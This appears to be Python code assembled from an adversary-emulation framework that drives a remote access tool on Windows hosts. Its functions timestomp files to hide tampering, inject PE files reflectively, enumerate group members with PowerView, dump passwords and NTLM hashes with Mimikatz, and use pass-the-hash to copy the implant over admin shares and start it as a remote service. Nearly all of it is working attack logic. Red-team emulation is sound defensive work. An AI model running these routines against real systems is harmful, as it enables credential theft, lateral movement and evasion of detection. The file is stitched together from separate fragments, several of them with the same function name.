async def action(operation, rat, host, file, file_g):
results = await operation.execute_powershell(
rat, "timestomper",
PSFunction('Perform-Timestomp', PSArg('FileLocation', file.path),
PSArg('Verbose')), parsers.timestomp.timestomp)
# Don't parse if type 0 failure
if results == {}:
return False
# Unpack parser...
if results["TimestampModified"] == "True":
timestamp_modified = True
else:
timestamp_modified = False
await file_g({
'path': file.path,
'host': file.host,
'use_case': file.use_case,
'new_creation_time': results["CreationTime"],
'new_last_access': results["LastAccessTime"],
'new_last_write': results["LastWriteTime"],
'old_creation_time': results["OldCreationTime"],
'old_last_access': results["OldAccessTime"],
'old_last_write': results["OldWriteTime"],
'timestomped': timestamp_modified
})
return True
def invoke_reflective_pe_injection(rat: Rat, binary_name: str,
command: CommandLine):
anchor = "reflectivepe.{}".format(binary_name)
# command = 'Invoke-ReflectivePEInjection -PEBytes $EncodedPE -ExeArgs "{}"'.format(command)
command = PSFunction('Invoke-ReflectivePEInjection',
PSArg('PEbase64', '$EncodedPE', escape=None),
PSArg('ExeArgs', command.command_line))
return powershell_function(rat, anchor, command)
async def fix_domain_pass(op: Operation, target_host: ObservedHost, user: str,
password: str, domain: str, srv_op, del_fun):
core = await spawn_recovery_rat(target_host, user, "CalderaRulez%123",
domain, srv_op)
await rat_operation(
srv_op, core, srv_op._interface.powershell_function, "footprint",
PSFunction("Password-Mayhem-Clean", PSArg("userID", user),
PSArg('pass', password, escape=escape_string_literally)))
loc = ObservedFile(**{
'path': 'C:\cleanup.exe',
'host': target_host,
'use_case': 'dropped'
}).save()
await clean_recovery_rat(core, loc, del_fun)
async def action(operation, rat, host, domain_g, user_g):
objects = await operation.execute_powershell(
rat, "powerview",
PSFunction('Get-NetLocalGroupMember',
PSArg('ComputerName', host.hostname)),
parsers.powerview.getnetlocalgroupmember)
for parsed_user in objects:
# find the user for this account
user_dict = {
'username': parsed_user['username'],
'is_group': parsed_user['is_group'],
'sid': parsed_user['sid']
}
if 'dns_domain' in parsed_user:
domain = await domain_g(
{'dns_domain': parsed_user['dns_domain']})
user_dict['domain'] = domain
elif 'windows_domain' in parsed_user:
domain = await domain_g(
{'windows_domain': parsed_user['windows_domain']})
user_dict['domain'] = domain
else:
user_dict['host'] = host
await user_g(user_dict)
return True
async def action(operation, rat, user, host, dest_host, cred, domain, file_g):
filepath = "\\" + operation.adversary_artifactlist.get_executable_word()
# echo F | xcopy will automatically create missing directories
final_command = "cmd.exe /c echo F | xcopy {0} \\\\{1}\\c${2}".format(rat.executable, dest_host.hostname, filepath)
mimikatz_command = MimikatzCommand(privilege_debug(),
sekurlsa_pth(user=user.username, domain=domain.windows_domain,
ntlm=cred.hash, run=final_command),
mimi_exit())
if host.os_version.major_version >= 10:
# Pass compiled mimikatz.exe into Invoke-ReflectivePEInjection PowerSploit script. This works on
# windows 10 and patched older systems (KB3126593 / MS16-014 update installed)
await operation.reflectively_execute_exe(rat, "mimi64-exe", mimikatz_command.command,
parsers.mimikatz.sekurlsa_pth)
else:
# Use Invoke-Mimikatz (trouble getting this working on Windows 10 as of 8/2017).
await operation.execute_powershell(rat, "powerkatz",
PSFunction('Invoke-Mimikatz',
PSArg("Command", mimikatz_command.command.command_line)),
parsers.mimikatz.sekurlsa_pth)
await file_g({'src_host': dest_host, 'src_path': rat.executable, 'path': "C:" + filepath, 'use_case': 'rat'})
return True
async def action(operation, rat, host, domain_g, credential_g, user_g):
mimikatz_command = MimikatzCommand(privilege_debug(),
sekurlsa_logonpasswords(),
mimi_exit())
accounts = await operation.execute_powershell(
rat, "powerkatz",
PSFunction("Invoke-Mimikatz",
PSArg("Command", mimikatz_command.command)),
parsers.mimikatz.sekurlsa_logonpasswords_condensed)
for account in accounts:
user_obj = {
'username': account['Username'].lower(),
'is_group': False
}
credential_obj = {}
if 'Password' in account:
credential_obj['password'] = account['Password']
if 'NTLM' in account:
credential_obj["hash"] = account['NTLM']
# if the domain is not the hostname, this is a Domain account
if account['Domain'].lower() != host.hostname.lower():
domain = await domain_g(
{'windows_domain': account['Domain'].lower()})
user_obj['domain'] = domain
else:
user_obj['host'] = host
credential_obj['found_on_host'] = host
user = await user_g(user_obj)
credential_obj['user'] = user
await credential_g(credential_obj)
return True
async def action(operation, rat, dest_host, rat_file, cred, user, domain,
service_g, rat_g):
svcname = operation.adversary_artifactlist.get_service_word()
remote_host = None
if dest_host != rat.host:
remote_host = dest_host.fqdn
bin_path = rat_file.path
create_command = MimikatzCommand(
privilege_debug(),
sekurlsa_pth(
user=user.username,
domain=domain.windows_domain,
ntlm=cred.hash,
run=sc.create(bin_path, svcname,
remote_host=remote_host)[0].command_line),
mimi_exit())
start_command = MimikatzCommand(
privilege_debug(),
sekurlsa_pth(
user=user.username,
domain=domain.windows_domain,
ntlm=cred.hash,
run=sc.start(svcname,
remote_host=remote_host)[0].command_line),
mimi_exit())
if rat.host.os_version.major_version >= 10:
# Pass compiled mimikatz.exe into Invoke-ReflectivePEInjection PowerSploit script. This works on
# windows 10 and patched older systems (KB3126593 / MS16-014 update installed)
await operation.reflectively_execute_exe(
rat, "mimi64-exe", create_command.command,
parsers.mimikatz.sekurlsa_pth)
await service_g({
'name': svcname,
'bin_path': rat_file.path,
'host': dest_host
})
await operation.reflectively_execute_exe(
rat, "mimi64-exe", start_command.command,
parsers.mimikatz.sekurlsa_pth)
else:
# Use Invoke-Mimikatz (trouble getting this working on Windows 10 as of 8/2017).
await operation.execute_powershell(
rat, "powerkatz",
PSFunction('Invoke-Mimikatz',
PSArg("Command", create_command.command)),
parsers.mimikatz.sekurlsa_pth)
await service_g({
'name': svcname,
'bin_path': rat_file.path,
'host': dest_host
})
await operation.execute_powershell(
rat, "powerkatz",
PSFunction('Invoke-Mimikatz',
PSArg("Command", start_command.command)),
parsers.mimikatz.sekurlsa_pth)
await rat_g()
return True